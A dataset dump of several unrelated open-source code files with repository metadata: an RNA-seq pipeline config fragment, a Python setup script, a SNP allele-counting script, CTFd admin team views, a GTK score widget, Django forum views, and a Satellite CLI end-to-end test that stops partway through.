# "mgi_symbol" (mice/rats) if available. If not, the "external_gene_id" is used
# to obtain the gene symbol. You can change this by editing the script:
# scripts/combine_and_annotate.r
annotation_dataset = "hsapiens_gene_ensembl"
#---------------------------------
# SCRIPT PATHS
#---------------------------------
# Paths to other wrapper scripts needed to run the pipeline. Make sure these
# paths are relative to the directory where you plan to run the pipeline in or
# change them to absolute paths.
html_index_script = "scripts/html_index.py"
index_script = "scripts/build_index.sh"
tophat_script = "scripts/run_tophat.sh"
merge_tophat_script = "scripts/merge_tophat.sh"
fix_tophat_unmapped_reads_script = "scripts/fix_tophat_unmapped_reads.py"
htseq_script = "scripts/run_htseq.sh"
fastqc_parse_script = "scripts/fastqc_parse.py"
qc_parse_script = "scripts/qc_parse.py"
alignment_stats_script = "scripts/alignment_stats.sh"
combine_and_annotate_script = "scripts/combine_and_annotate.R"
de_analysis_script = "scripts/de_analysis.R"
#---------------------------------
# PROGRAM PATHS
#---------------------------------
trimmomatic_path = "/usr/local/trimmomatic/0.30/trimmomatic-0.30.jar"
reorder_sam_path = "/usr/local/picard/1.69/lib/ReorderSam.jar"
mark_duplicates_path = "/usr/local/picard/1.69/lib/MarkDuplicates.jar"
rnaseqc_path = "/usr/local/rnaseqc/1.1.7/RNA-SeQC_v1.1.7.jar"
add_or_replace_read_groups_path = "/usr/local/picard/1.69/lib/AddOrReplaceReadGroups.jar"
|
mit
| -6,517,727,467,118,857,000
| 39.791878
| 146
| 0.697113
| false
| 3.297497
| false
| false
| false
|
HunterBaines/sudb
|
setup.py
|
1
|
1155
|
# Author: Hunter Baines <0x68@protonmail.com>
# Copyright: (C) 2017 Hunter Baines
# License: GNU GPL version 3
import sys
from distutils.core import setup
import sudb
FAILURE = '\033[1;31m' + 'Install cannot proceed.' + '\033[00m'
if len(sys.argv) > 1 and sys.argv[1] == 'install':
# Check python version
if sys.version_info < (3, 4):
sys.exit(FAILURE + ' Sorry, Python 3.4 or above is required.')
setup(name='sudb',
description='Sudoku debugger',
long_description=sudb.__doc__,
author=sudb.__author__,
author_email=sudb.__email__,
license=sudb.__license__,
packages=['sudb'],
scripts=['scripts/sudb'],
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Intended Audience :: Developers',
'Intended Audience :: End Users/Desktop',
'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
'Operating System :: MacOS',
'Operating System :: POSIX',
'Programming Language :: Python :: 3 :: Only',
'Topic :: Games/Entertainment :: Puzzle Games'
]
)
|
gpl-3.0
| -9,102,236,818,809,176,000
| 28.615385
| 77
| 0.592208
| false
| 3.737864
| false
| true
| false
|
gersteinlab/AlleleDB
|
alleledb_pipeline/CombineSnpCounts.py
|
1
|
5465
|
import gc, os, sys, string, re, pdb, scipy.stats, cPickle
import Mapping2, getNewer1000GSNPAnnotations, Bowtie, binom, GetCNVAnnotations, dictmerge, utils, InBindingSite
TABLE=string.maketrans('ACGTacgt', 'TGCAtgca')
USAGE="%s mindepth snpfile bindingsites cnvfile outfile logfile countfile [countfile ...]"
def reverseComplement(seq):
tmp=seq[::-1]
return tmp.translate(TABLE)
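# For example: reverseComplement('AAC') == 'GTT' (reverse, then
# complement via the ACGT<->TGCA translation table above).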
def makeMappers(maptmplt):
mappers={}
cs=['chr%s' % str(c) for c in range(1,23)] + ['chrX', 'chrY', 'chrM']
for c in cs:
f=maptmplt % c
if os.path.exists(f):
mappers[c] = Mapping2.Mapping(f)
return mappers
THRESH1=0.90
THRESH2=0.05
SYMMETRIC="Sym"
ASYMMETRIC="Asym"
HOMOZYGOUS="Homo"
WEIRD="Weird"
tbl={
'a':('a','a'),
'c':('c','c'),
'g':('g','g'),
't':('t','t'),
'r':('a','g'),
'y':('c','t'),
's':('c','g'),
'w':('a','t'),
'k':('g','t'),
'm':('a','c')
}
def convert(a):
return tbl[a.lower()]
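# Illustrative examples (IUPAC ambiguity codes): convert('r') returns
# ('a', 'g') for an a/g heterozygote, while convert('a') returns
# ('a', 'a') for a homozygote.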
def testCounts(counts, chrm, snprec):
winningParent='?'
ref_pos, mat_genotype, pat_genotype, child_genotype, mat_allele, pat_allele, typ, ref, hetSNP = snprec
# first, make sure that the expected alleles are the bulk of the counts
total = counts['a']+counts['c']+counts['g']+counts['t']
a1,a2=convert(child_genotype)
if a1==a2:
allelecnts = counts[a1]
else:
allelecnts = counts[a1]+counts[a2]
both=counts[a1]+counts[a2]
sortedCounts=sorted([(counts['a'], 'a'), (counts['c'],'c'), (counts['g'], 'g'), (counts['t'], 't')], reverse=True)
majorAllele=sortedCounts[0][1]
smaller=min(counts[a1], counts[a2])
#pval=binomialDist.cdf(smaller, both, 0.5)*2 # This had problems for large sample sizes. Switched to using scipy
pval = binom.binomtest(smaller, both, 0.5) # scipy.binom_test was unstable for large counts
if float(allelecnts)/total < THRESH1:
print >>LOGFP, "WARNING %s:%d failed thresh 1 %d %d" % (chrm, ref_pos, allelecnts, total)
return (WEIRD, pval, a1, a2, counts, winningParent)
# if the snp was phased
if mat_allele and pat_allele:
if mat_allele.lower()==majorAllele.lower():
winningParent='M'
elif pat_allele.lower()==majorAllele.lower():
winningParent='P'
else:
winningParent='?'
if a1!=a2:
# we expect roughly 50/50.
if pval < THRESH2:
print >>LOGFP, "NOTE %s:%d Looks interesting: failed thresh 2 %d %d %f" % (chrm, ref_pos, both, smaller, pval)
print >>LOGFP, "SNPS %s/%s, COUNTS a:%d c:%d g:%d t:%d" % (a1, a2, counts['a'], counts['c'], counts['g'], counts['t'])
print >>LOGFP, "Phasing P:%s M:%s D:%s" % (pat_allele, mat_allele, snprec)
print >>LOGFP, "\n"
return (ASYMMETRIC, pval, a1, a2, counts, winningParent)
else:
return (SYMMETRIC, pval, a1, a2, counts, winningParent)
else:
return (HOMOZYGOUS, pval, a1, a2, counts, winningParent)
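# Illustrative example (numbers are mine, not from the source): for a
# het call 'r' (a/g) with counts a=18, g=2, c=0, t=0, smaller=2 and
# both=20 give a two-sided binomial p of roughly 0.0004 < THRESH2, so
# the site is reported ASYMMETRIC; counts of a=11, g=9 give p ~ 0.82
# and the site is reported SYMMETRIC.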
def process(chrm, snppos, counts, snprec, CNVhandler):
ref_pos, mat_genotype, pat_genotype, child_genotype, mat_allele, pat_allele, typ, ref, hetSNP = snprec
t, pval, a1, a2, counts, winningParent = testCounts(counts, chrm, snprec)
#if t==ASYMMETRIC or t==SYMMETRIC:
# hetSnps+=1
#if t==ASYMMETRIC:
# interestingSnps+=1
if BShandler:
inBS=1 if BShandler.check("chr%s"%chrm, snppos) else 0
else:
inBS=-1
cnv=CNVhandler.getAnnotation("chr%s"%chrm, snppos)
if cnv:
cnv=cnv[2]
else:
cnv='1.0'
#nd, np = scipy.stats.kstest(ksvals, 'uniform', (0.0, 1.0))
print >>OUTFP, utils.myFormat('\t', (chrm, snppos, ref, mat_genotype, pat_genotype, child_genotype, typ, mat_allele, pat_allele, counts['a'], counts['c'], counts['g'], counts['t'], winningParent, t, pval, inBS, cnv))
OUTFP.flush()
# This is used to order the chromosomes 1,2,3,...,22,X,Y. Tricky, eh?
def chrcmp(a, b):
try:
a=int(a)
except:
pass
try:
b=int(b)
except:
pass
return cmp(a,b)
if __name__=='__main__':
    if len(sys.argv) < 8:
print USAGE % sys.argv[0]
sys.exit(-1)
mindepth=int(sys.argv[1])
snpfile=sys.argv[2]
BindingSitefile=sys.argv[3]
CNVFile=sys.argv[4]
OUTFP = open(sys.argv[5], 'w')
LOGFP = open(sys.argv[6], 'w')
countfiles=sys.argv[7:]
if os.access(BindingSitefile, os.R_OK):
BShandler=InBindingSite.BSHandler(BindingSitefile)
else:
BShandler=None
CNVhandler=GetCNVAnnotations.Handler(CNVFile)
hetSnps=0
interestingSnps=0
gc.disable()
pat=re.compile('chr(\w+)_([mp]aternal)')
print >>OUTFP, utils.myFormat('\t', ['chrm', 'snppos ', 'ref', 'mat_gtyp', 'pat_gtyp', 'c_gtyp', 'phase', 'mat_all', 'pat_all', 'cA', 'cC', 'cG', 'cT', 'winning', 'SymCls', 'SymPval', 'BindingSite', 'cnv'])
ref_1000G=getNewer1000GSNPAnnotations.Handler(snpfile, None, 'PAT', hasHeader=True, onlyHets=True)
counts={}
for countfile in countfiles:
temp=cPickle.load(open(countfile))
dictmerge.accum(counts, temp, lambda : 0, lambda a, b: a+b)
for chrm in sorted(counts.keys(), chrcmp):
for pos in sorted(counts[chrm].keys()):
total = sum(counts[chrm][pos].values())
if total >= mindepth:
process(chrm, pos, counts[chrm][pos], ref_1000G.getAnnotation(chrm, pos), CNVhandler)
|
cc0-1.0
| -3,136,855,795,635,907,600
| 30.959064
| 220
| 0.598536
| false
| 2.785423
| false
| false
| false
|
mschwager/CTFd
|
CTFd/admin/teams.py
|
1
|
9765
|
from flask import current_app as app, render_template, request, redirect, jsonify, url_for, Blueprint
from CTFd.utils import admins_only, is_admin, unix_time, get_config, \
set_config, sendmail, rmdir, create_image, delete_image, run_image, container_status, container_ports, \
container_stop, container_start, get_themes, cache, upload_file
from CTFd.models import db, Teams, Solves, Awards, Containers, Challenges, WrongKeys, Keys, Tags, Files, Tracking, Pages, Config, DatabaseError
from passlib.hash import bcrypt_sha256
from sqlalchemy.sql import not_
admin_teams = Blueprint('admin_teams', __name__)
@admin_teams.route('/admin/teams', defaults={'page': '1'})
@admin_teams.route('/admin/teams/<int:page>')
@admins_only
def admin_teams_view(page):
page = abs(int(page))
results_per_page = 50
page_start = results_per_page * (page - 1)
page_end = results_per_page * (page - 1) + results_per_page
teams = Teams.query.order_by(Teams.id.asc()).slice(page_start, page_end).all()
count = db.session.query(db.func.count(Teams.id)).first()[0]
pages = int(count / results_per_page) + (count % results_per_page > 0)
return render_template('admin/teams.html', teams=teams, pages=pages, curr_page=page)
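# Illustrative example (not in the original): with 120 teams and 50
# results per page, count=120 gives pages = int(120 / 50) + (120 % 50 > 0)
# = 3, and page 2 slices teams 50..99.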
@admin_teams.route('/admin/team/<int:teamid>', methods=['GET', 'POST'])
@admins_only
def admin_team(teamid):
user = Teams.query.filter_by(id=teamid).first_or_404()
if request.method == 'GET':
solves = Solves.query.filter_by(teamid=teamid).all()
solve_ids = [s.chalid for s in solves]
missing = Challenges.query.filter(not_(Challenges.id.in_(solve_ids))).all()
last_seen = db.func.max(Tracking.date).label('last_seen')
addrs = db.session.query(Tracking.ip, last_seen) \
.filter_by(team=teamid) \
.group_by(Tracking.ip) \
.order_by(last_seen.desc()).all()
wrong_keys = WrongKeys.query.filter_by(teamid=teamid).order_by(WrongKeys.date.asc()).all()
awards = Awards.query.filter_by(teamid=teamid).order_by(Awards.date.asc()).all()
score = user.score()
place = user.place()
return render_template('admin/team.html', solves=solves, team=user, addrs=addrs, score=score, missing=missing,
place=place, wrong_keys=wrong_keys, awards=awards)
elif request.method == 'POST':
admin_user = request.form.get('admin', None)
if admin_user:
admin_user = True if admin_user == 'true' else False
user.admin = admin_user
# Set user.banned to hide admins from scoreboard
user.banned = admin_user
db.session.commit()
db.session.close()
return jsonify({'data': ['success']})
verified = request.form.get('verified', None)
if verified:
verified = True if verified == 'true' else False
user.verified = verified
db.session.commit()
db.session.close()
return jsonify({'data': ['success']})
name = request.form.get('name', None)
password = request.form.get('password', None)
email = request.form.get('email', None)
website = request.form.get('website', None)
affiliation = request.form.get('affiliation', None)
country = request.form.get('country', None)
errors = []
name_used = Teams.query.filter(Teams.name == name).first()
if name_used and int(name_used.id) != int(teamid):
errors.append('That name is taken')
email_used = Teams.query.filter(Teams.email == email).first()
if email_used and int(email_used.id) != int(teamid):
errors.append('That email is taken')
if errors:
db.session.close()
return jsonify({'data': errors})
else:
user.name = name
user.email = email
if password:
user.password = bcrypt_sha256.encrypt(password)
user.website = website
user.affiliation = affiliation
user.country = country
db.session.commit()
db.session.close()
return jsonify({'data': ['success']})
@admin_teams.route('/admin/team/<int:teamid>/mail', methods=['POST'])
@admins_only
def email_user(teamid):
message = request.form.get('msg', None)
team = Teams.query.filter(Teams.id == teamid).first()
if message and team:
if sendmail(team.email, message):
return '1'
return '0'
@admin_teams.route('/admin/team/<int:teamid>/ban', methods=['POST'])
@admins_only
def ban(teamid):
user = Teams.query.filter_by(id=teamid).first_or_404()
user.banned = True
db.session.commit()
db.session.close()
return redirect(url_for('admin_scoreboard.admin_scoreboard_view'))
@admin_teams.route('/admin/team/<int:teamid>/unban', methods=['POST'])
@admins_only
def unban(teamid):
user = Teams.query.filter_by(id=teamid).first_or_404()
user.banned = False
db.session.commit()
db.session.close()
return redirect(url_for('admin_scoreboard.admin_scoreboard_view'))
@admin_teams.route('/admin/team/<int:teamid>/delete', methods=['POST'])
@admins_only
def delete_team(teamid):
try:
WrongKeys.query.filter_by(teamid=teamid).delete()
Solves.query.filter_by(teamid=teamid).delete()
Tracking.query.filter_by(team=teamid).delete()
Teams.query.filter_by(id=teamid).delete()
db.session.commit()
db.session.close()
except DatabaseError:
return '0'
else:
return '1'
@admin_teams.route('/admin/solves/<teamid>', methods=['GET'])
@admins_only
def admin_solves(teamid="all"):
if teamid == "all":
solves = Solves.query.all()
else:
solves = Solves.query.filter_by(teamid=teamid).all()
awards = Awards.query.filter_by(teamid=teamid).all()
db.session.close()
json_data = {'solves': []}
for x in solves:
json_data['solves'].append({
'id': x.id,
'chal': x.chal.name,
'chalid': x.chalid,
'team': x.teamid,
'value': x.chal.value,
'category': x.chal.category,
'time': unix_time(x.date)
})
for award in awards:
json_data['solves'].append({
'chal': award.name,
'chalid': None,
'team': award.teamid,
'value': award.value,
'category': award.category or "Award",
'time': unix_time(award.date)
})
json_data['solves'].sort(key=lambda k: k['time'])
return jsonify(json_data)
@admin_teams.route('/admin/fails/all', defaults={'teamid': 'all'}, methods=['GET'])
@admin_teams.route('/admin/fails/<int:teamid>', methods=['GET'])
@admins_only
def admin_fails(teamid):
if teamid == "all":
        fails = WrongKeys.query.join(Teams, WrongKeys.teamid == Teams.id).filter(not_(Teams.banned)).count()
        solves = Solves.query.join(Teams, Solves.teamid == Teams.id).filter(not_(Teams.banned)).count()
db.session.close()
json_data = {'fails': str(fails), 'solves': str(solves)}
return jsonify(json_data)
else:
fails = WrongKeys.query.filter_by(teamid=teamid).count()
solves = Solves.query.filter_by(teamid=teamid).count()
db.session.close()
json_data = {'fails': str(fails), 'solves': str(solves)}
return jsonify(json_data)
@admin_teams.route('/admin/solves/<int:teamid>/<int:chalid>/solve', methods=['POST'])
@admins_only
def create_solve(teamid, chalid):
solve = Solves(chalid=chalid, teamid=teamid, ip='127.0.0.1', flag='MARKED_AS_SOLVED_BY_ADMIN')
db.session.add(solve)
db.session.commit()
db.session.close()
return '1'
@admin_teams.route('/admin/solves/<int:keyid>/delete', methods=['POST'])
@admins_only
def delete_solve(keyid):
solve = Solves.query.filter_by(id=keyid).first_or_404()
db.session.delete(solve)
db.session.commit()
db.session.close()
return '1'
@admin_teams.route('/admin/wrong_keys/<int:keyid>/delete', methods=['POST'])
@admins_only
def delete_wrong_key(keyid):
wrong_key = WrongKeys.query.filter_by(id=keyid).first_or_404()
db.session.delete(wrong_key)
db.session.commit()
db.session.close()
return '1'
@admin_teams.route('/admin/awards/<int:award_id>/delete', methods=['POST'])
@admins_only
def delete_award(award_id):
award = Awards.query.filter_by(id=award_id).first_or_404()
db.session.delete(award)
db.session.commit()
db.session.close()
return '1'
@admin_teams.route('/admin/teams/<int:teamid>/awards', methods=['GET'])
@admins_only
def admin_awards(teamid):
awards = Awards.query.filter_by(teamid=teamid).all()
awards_list = []
for award in awards:
awards_list.append({
'id': award.id,
'name': award.name,
'description': award.description,
'date': award.date,
'value': award.value,
'category': award.category,
'icon': award.icon
})
json_data = {'awards': awards_list}
return jsonify(json_data)
@admin_teams.route('/admin/awards/add', methods=['POST'])
@admins_only
def create_award():
try:
teamid = request.form['teamid']
name = request.form.get('name', 'Award')
value = request.form.get('value', 0)
award = Awards(teamid, name, value)
award.description = request.form.get('description')
award.category = request.form.get('category')
db.session.add(award)
db.session.commit()
db.session.close()
return '1'
except Exception as e:
print(e)
return '0'
|
apache-2.0
| -7,619,913,300,284,369,000
| 34.769231
| 143
| 0.611162
| false
| 3.341889
| false
| false
| false
|
pmoleri/memorize-accesible
|
score.py
|
1
|
2642
|
# Copyright (C) 2006, 2007, 2008 One Laptop Per Child
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
import svglabel
import gtk
import os
import theme
class Score(svglabel.SvgLabel):
selected_color = "#818286"
default_color = "#4c4d4f"
status = False
def __init__(self, fill_color, stroke_color, pixbuf=None,
pixbuf_sel=None, status=False):
filename = os.path.join(os.path.dirname(__file__), "images/score.svg")
self.pixbuf_un = pixbuf
self.pixbuf_sel = pixbuf_sel
self.status = status
        if self.pixbuf_un is None:
self.pixbuf_un = svglabel.SvgLabel(filename, fill_color,
stroke_color, False,
self.default_color).get_pixbuf()
        if self.pixbuf_sel is None:
label = svglabel.SvgLabel(filename, fill_color, stroke_color,
False, self.selected_color)
self.pixbuf_sel = label.get_pixbuf()
if status:
self.pixbuf = self.pixbuf_sel
else:
self.pixbuf = self.pixbuf_un
svglabel.SvgLabel.__init__(self, filename, fill_color, stroke_color,
self.pixbuf, self.default_color, theme.SCORE_SIZE,
theme.SCORE_SIZE)
self.set_selected(status)
def set_selected(self, status):
self.status = status
if status:
self.pixbuf = self.pixbuf_sel
self.modify_bg(gtk.STATE_NORMAL,
gtk.gdk.color_parse(self.selected_color))
else:
self.pixbuf = self.pixbuf_un
self.modify_bg(gtk.STATE_NORMAL,
gtk.gdk.color_parse(self.default_color))
self.queue_draw()
def get_pixbuf_un(self):
return self.pixbuf_un
def get_pixbuf_sel(self):
return self.pixbuf_sel
|
gpl-2.0
| -4,537,865,268,180,813,000
| 36.211268
| 79
| 0.589326
| false
| 4.021309
| false
| false
| false
|
pythonbyexample/PBE
|
dbe/social/views.py
|
1
|
3177
|
# Imports {{{
from PIL import Image as PImage
from dbe.settings import MEDIA_ROOT, MEDIA_URL
from dbe.social.models import *
from dbe.shared.utils import *
from dbe.classviews.list_custom import ListView, ListRelated
from dbe.classviews.edit_custom import CreateView, UpdateView2
from forms import ProfileForm, PostForm
# }}}
class Main(ListView):
"""Main listing."""
model = Forum
context_object_name = "socials"
template_name = "social/list.html"
class ForumView(ListRelated):
"""Listing of threads in a social."""
model = Thread
related_model = Forum
foreign_key_field = "social"
context_object_name = "threads"
template_name = "social.html"
class ThreadView(ListRelated):
"""Listing of posts in a thread."""
model = Post
related_model = Thread
foreign_key_field = "thread"
context_object_name = "posts"
template_name = "thread.html"
class EditProfile(UpdateView2):
model = UserProfile
form_class = ProfileForm
success_url = '#'
template_name = "profile.html"
def form_valid(self, form):
"""Resize and save profile image."""
# remove old image if changed
name = form.cleaned_data.get("avatar", None)
old = UserProfile.objects.get( pk=self.kwargs.get("pk") ).avatar
if old.name and old.name != name:
old.delete()
# save new image to disk & resize new image
self.object = form.save()
if self.object.avatar:
img = PImage.open(self.object.avatar.path)
img.thumbnail((160,160), PImage.ANTIALIAS)
img.save(img.filename, "JPEG")
return redir(self.success_url)
def add_context(self):
img = ("/media/" + self.object.avatar.name) if self.object.avatar else None
return dict(img=img)
class NewTopic(CreateView):
model = Post
form_class = PostForm
title = "Start New Topic"
template_name = "social/post.html"
def increment_post_counter(self):
"""Increment counter of user's posts."""
profile = self.request.user.user_profile
profile.posts += 1
profile.save()
def get_thread(self, form):
data = form.cleaned_data
social = Forum.objects.get(pk=self.args[0])
return Thread.objects.create(social=social, title=data["title"], creator=self.request.user)
def form_valid(self, form):
"""Create new topic."""
data = form.cleaned_data
thread = self.get_thread(form)
Post.objects.create(thread=thread, title=data["title"], body=data["body"], creator=self.request.user)
self.increment_post_counter()
return self.get_success_url()
def get_success_url(self):
return redir("social", pk=self.args[0])
class Reply(NewTopic):
title = "Reply"
def get_success_url(self):
return redir(reverse2("thread", pk=self.args[0]) + "?page=last")
def get_thread(self, form):
return Thread.objects.get(pk=self.args[0])
def social_context(request):
return dict(media_url=MEDIA_URL)
|
bsd-3-clause
| 5,048,343,791,437,051,000
| 28.691589
| 109
| 0.619452
| false
| 3.681344
| false
| false
| false
|
rplevka/robottelo
|
tests/foreman/endtoend/test_cli_endtoend.py
|
1
|
12904
|
"""Smoke tests for the ``CLI`` end-to-end scenario.
:Requirement: Cli Endtoend
:CaseAutomation: Automated
:CaseLevel: Acceptance
:CaseComponent: Hammer
:Assignee: gtalreja
:TestType: Functional
:CaseImportance: High
:Upstream: No
"""
import random
import pytest
from fauxfactory import gen_alphanumeric
from fauxfactory import gen_ipaddr
from .utils import AK_CONTENT_LABEL
from .utils import ClientProvisioningMixin
from robottelo import manifests
from robottelo import ssh
from robottelo.cli.activationkey import ActivationKey
from robottelo.cli.computeresource import ComputeResource
from robottelo.cli.contentview import ContentView
from robottelo.cli.domain import Domain
from robottelo.cli.factory import make_user
from robottelo.cli.host import Host
from robottelo.cli.hostgroup import HostGroup
from robottelo.cli.lifecycleenvironment import LifecycleEnvironment
from robottelo.cli.location import Location
from robottelo.cli.org import Org
from robottelo.cli.product import Product
from robottelo.cli.puppetmodule import PuppetModule
from robottelo.cli.repository import Repository
from robottelo.cli.repository_set import RepositorySet
from robottelo.cli.subnet import Subnet
from robottelo.cli.subscription import Subscription
from robottelo.cli.user import User
from robottelo.config import setting_is_set
from robottelo.config import settings
from robottelo.constants import DEFAULT_LOC
from robottelo.constants import DEFAULT_ORG
from robottelo.constants import DEFAULT_SUBSCRIPTION_NAME
from robottelo.constants import PRDS
from robottelo.constants import REPOS
from robottelo.constants import REPOSET
from robottelo.constants.repos import CUSTOM_RPM_REPO
from robottelo.constants.repos import FAKE_0_PUPPET_REPO
@pytest.fixture(scope='module')
def fake_manifest_is_set():
return setting_is_set('fake_manifest')
@pytest.mark.tier1
@pytest.mark.upgrade
def test_positive_cli_find_default_org():
"""Check if 'Default Organization' is present
:id: 95ffeb7a-134e-4273-bccc-fe8a3a336b2a
:expectedresults: 'Default Organization' is found
"""
result = Org.info({'name': DEFAULT_ORG})
assert result['name'] == DEFAULT_ORG
@pytest.mark.tier1
@pytest.mark.upgrade
def test_positive_cli_find_default_loc():
"""Check if 'Default Location' is present
:id: 11cf0d06-78ff-47e8-9d50-407a2ea31988
:expectedresults: 'Default Location' is found
"""
result = Location.info({'name': DEFAULT_LOC})
assert result['name'] == DEFAULT_LOC
@pytest.mark.tier1
@pytest.mark.upgrade
def test_positive_cli_find_admin_user():
"""Check if Admin User is present
:id: f6755189-05a6-4d2f-a3b8-98be0cfacaee
:expectedresults: Admin User is found and has Admin role
"""
result = User.info({'login': 'admin'})
assert result['login'] == 'admin'
assert result['admin'] == 'yes'
@pytest.mark.skip_if_not_set('compute_resources')
@pytest.mark.tier4
@pytest.mark.on_premises_provisioning
@pytest.mark.upgrade
@pytest.mark.skipif((not settings.repos_hosting_url), reason='Missing repos_hosting_url')
def test_positive_cli_end_to_end(fake_manifest_is_set):
"""Perform end to end smoke tests using RH and custom repos.
1. Create a new user with admin permissions
2. Using the new user from above
1. Create a new organization
2. Clone and upload manifest
3. Create a new lifecycle environment
4. Create a custom product
5. Create a custom YUM repository
6. Create a custom PUPPET repository
7. Enable a Red Hat repository
8. Synchronize the three repositories
9. Create a new content view
10. Associate the YUM and Red Hat repositories to new content view
11. Add a PUPPET module to new content view
12. Publish content view
13. Promote content view to the lifecycle environment
14. Create a new activation key
15. Add the products to the activation key
16. Create a new libvirt compute resource
17. Create a new subnet
18. Create a new domain
19. Create a new hostgroup and associate previous entities to it
20. Provision a client
:id: 8c8b3ffa-0d54-436b-8eeb-1a3542e100a8
:expectedresults: All steps should succeed and content should be
successfully fetched by the client.
"""
# step 1: Create a new user with admin permissions
password = gen_alphanumeric()
user = make_user({'admin': 'true', 'password': password})
user['password'] = password
# step 2.1: Create a new organization
org = _create(user, Org, {'name': gen_alphanumeric()})
# step 2.2: Clone and upload manifest
if fake_manifest_is_set:
with manifests.clone() as manifest:
ssh.upload_file(manifest.content, manifest.filename)
Subscription.upload({'file': manifest.filename, 'organization-id': org['id']})
# step 2.3: Create a new lifecycle environment
lifecycle_environment = _create(
user,
LifecycleEnvironment,
{'name': gen_alphanumeric(), 'organization-id': org['id'], 'prior': 'Library'},
)
# step 2.4: Create a custom product
product = _create(user, Product, {'name': gen_alphanumeric(), 'organization-id': org['id']})
repositories = []
# step 2.5: Create custom YUM repository
yum_repo = _create(
user,
Repository,
{
'content-type': 'yum',
'name': gen_alphanumeric(),
'product-id': product['id'],
'publish-via-http': 'true',
'url': CUSTOM_RPM_REPO,
},
)
repositories.append(yum_repo)
# step 2.6: Create custom PUPPET repository
puppet_repo = _create(
user,
Repository,
{
'content-type': 'puppet',
'name': gen_alphanumeric(),
'product-id': product['id'],
'publish-via-http': 'true',
'url': FAKE_0_PUPPET_REPO,
},
)
repositories.append(puppet_repo)
# step 2.7: Enable a Red Hat repository
if fake_manifest_is_set:
RepositorySet.enable(
{
'basearch': 'x86_64',
'name': REPOSET['rhva6'],
'organization-id': org['id'],
'product': PRDS['rhel'],
'releasever': '6Server',
}
)
rhel_repo = Repository.info(
{
'name': REPOS['rhva6']['name'],
'organization-id': org['id'],
'product': PRDS['rhel'],
}
)
repositories.append(rhel_repo)
# step 2.8: Synchronize the three repositories
for repo in repositories:
Repository.with_user(user['login'], user['password']).synchronize({'id': repo['id']})
# step 2.9: Create content view
content_view = _create(
user, ContentView, {'name': gen_alphanumeric(), 'organization-id': org['id']}
)
# step 2.10: Associate the YUM and Red Hat repositories to new content view
repositories.remove(puppet_repo)
for repo in repositories:
ContentView.add_repository(
{
'id': content_view['id'],
'organization-id': org['id'],
'repository-id': repo['id'],
}
)
# step 2.11: Add a PUPPET module to new content view
result = PuppetModule.with_user(user['login'], user['password']).list(
{'repository-id': puppet_repo['id'], 'per-page': False}
)
ContentView.with_user(user['login'], user['password']).puppet_module_add(
{'content-view-id': content_view['id'], 'id': random.choice(result)['id']}
)
# step 2.12: Publish content view
ContentView.with_user(user['login'], user['password']).publish({'id': content_view['id']})
# step 2.13: Promote content view to the lifecycle environment
content_view = ContentView.with_user(user['login'], user['password']).info(
{'id': content_view['id']}
)
assert len(content_view['versions']) == 1
cv_version = ContentView.with_user(user['login'], user['password']).version_info(
{'id': content_view['versions'][0]['id']}
)
assert len(cv_version['lifecycle-environments']) == 1
ContentView.with_user(user['login'], user['password']).version_promote(
{'id': cv_version['id'], 'to-lifecycle-environment-id': lifecycle_environment['id']}
)
# check that content view exists in lifecycle
content_view = ContentView.with_user(user['login'], user['password']).info(
{'id': content_view['id']}
)
assert len(content_view['versions']) == 1
cv_version = ContentView.with_user(user['login'], user['password']).version_info(
{'id': content_view['versions'][0]['id']}
)
assert len(cv_version['lifecycle-environments']) == 2
assert cv_version['lifecycle-environments'][-1]['id'] == lifecycle_environment['id']
# step 2.14: Create a new activation key
activation_key = _create(
user,
ActivationKey,
{
'content-view-id': content_view['id'],
'lifecycle-environment-id': lifecycle_environment['id'],
'name': gen_alphanumeric(),
'organization-id': org['id'],
},
)
# step 2.15: Add the products to the activation key
subscription_list = Subscription.with_user(user['login'], user['password']).list(
{'organization-id': org['id']}, per_page=False
)
for subscription in subscription_list:
if subscription['name'] == DEFAULT_SUBSCRIPTION_NAME:
ActivationKey.with_user(user['login'], user['password']).add_subscription(
{
'id': activation_key['id'],
'quantity': 1,
'subscription-id': subscription['id'],
}
)
# step 2.15.1: Enable product content
if fake_manifest_is_set:
ActivationKey.with_user(user['login'], user['password']).content_override(
{
'content-label': AK_CONTENT_LABEL,
'id': activation_key['id'],
'organization-id': org['id'],
'value': '1',
}
)
# BONUS: Create a content host and associate it with promoted
# content view and last lifecycle where it exists
content_host_name = gen_alphanumeric()
content_host = Host.with_user(user['login'], user['password']).subscription_register(
{
'content-view-id': content_view['id'],
'lifecycle-environment-id': lifecycle_environment['id'],
'name': content_host_name,
'organization-id': org['id'],
}
)
content_host = Host.with_user(user['login'], user['password']).info({'id': content_host['id']})
# check that content view matches what we passed
assert content_host['content-information']['content-view']['name'] == content_view['name']
# check that lifecycle environment matches
assert (
content_host['content-information']['lifecycle-environment']['name']
== lifecycle_environment['name']
)
# step 2.16: Create a new libvirt compute resource
_create(
user,
ComputeResource,
{
'name': gen_alphanumeric(),
'provider': 'Libvirt',
'url': f'qemu+ssh://root@{settings.compute_resources.libvirt_hostname}/system',
},
)
# step 2.17: Create a new subnet
subnet = _create(
user,
Subnet,
{
'name': gen_alphanumeric(),
'network': gen_ipaddr(ip3=True),
'mask': '255.255.255.0',
},
)
# step 2.18: Create a new domain
domain = _create(user, Domain, {'name': gen_alphanumeric()})
# step 2.19: Create a new hostgroup and associate previous entities to it
host_group = _create(
user,
HostGroup,
{'domain-id': domain['id'], 'name': gen_alphanumeric(), 'subnet-id': subnet['id']},
)
HostGroup.with_user(user['login'], user['password']).update(
{
'id': host_group['id'],
'organization-ids': org['id'],
'content-view-id': content_view['id'],
'lifecycle-environment-id': lifecycle_environment['id'],
}
)
# step 2.20: Provision a client
ClientProvisioningMixin().client_provisioning(activation_key['name'], org['label'])
def _create(user, entity, attrs):
"""Creates a Foreman entity and returns it.
:param dict user: A python dictionary representing a User
:param object entity: A valid CLI entity.
:param dict attrs: A python dictionary with attributes to use when
creating entity.
:return: A ``dict`` representing the Foreman entity.
:rtype: dict
"""
# Create new entity as new user
